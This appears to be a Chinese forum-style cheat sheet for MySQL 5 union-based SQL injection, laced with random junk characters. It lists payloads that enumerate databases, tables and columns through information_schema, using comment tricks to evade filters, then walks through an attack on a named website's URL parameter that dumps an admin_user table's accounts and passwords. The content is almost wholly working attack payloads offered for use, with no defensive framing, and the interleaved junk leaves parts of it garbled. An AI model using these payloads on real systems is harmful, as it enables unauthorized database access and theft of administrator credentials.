查库& g9 s( N' U1 k, e# P/ O9 I
- L( w0 w8 h( _' K \0 \6 Q
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*5 T4 t3 @/ u* r) {8 w6 G# r' G
! B+ V+ v; c) F$ u" f/ w4 F7 U
查表
( Y ~9 D" E6 W& N* t: w( \: O1 f9 b. U2 Y. L5 |) q @9 D
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,12 H! _3 H4 V8 S' `
& h2 \. E1 O" G6 u9 u, s
查段
' a! E: d/ w5 |. N1 q5 E& ^' X$ ~& o% J0 @- O
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,14 B" y3 \5 O' w% d5 K6 r0 a
( Q# \' N1 r0 b
' \6 d, _$ \7 u3 M( ^- u7 Ymysql5高级注入方法暴表
9 ~( z5 V0 h" h1 Y9 ^+ [2 `1 f9 |9 k+ ]1 x& y* n4 G e2 ]7 |0 W
例子如下:0 D. ~) C9 h* x4 B3 V
" y/ J; H9 j1 A
1.爆表# z/ f7 e9 C- g
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
: S7 ]' S. o# @$ R% _这样爆到第4个时出现了admin_user表。# j$ _; i7 \- K' T
. ~: T4 N1 s- B. [% _/ j0 x* A
2.暴字段& m/ {( `6 ?- J/ X* @2 v( P
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
4 }# x* i+ `! |# N
+ s; Z* ^! a3 i. b
: y6 f" P; R# ]# X5 \3.爆密码
1 L. I, t1 B$ Phttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* & Y+ C- e. O; Z' ]. M& G( x2 f
; v3 Y6 [" X. b& o3 }9 k4 k3 }0 o$ S
' [; f' u- b: ]7 w, W$ Z
|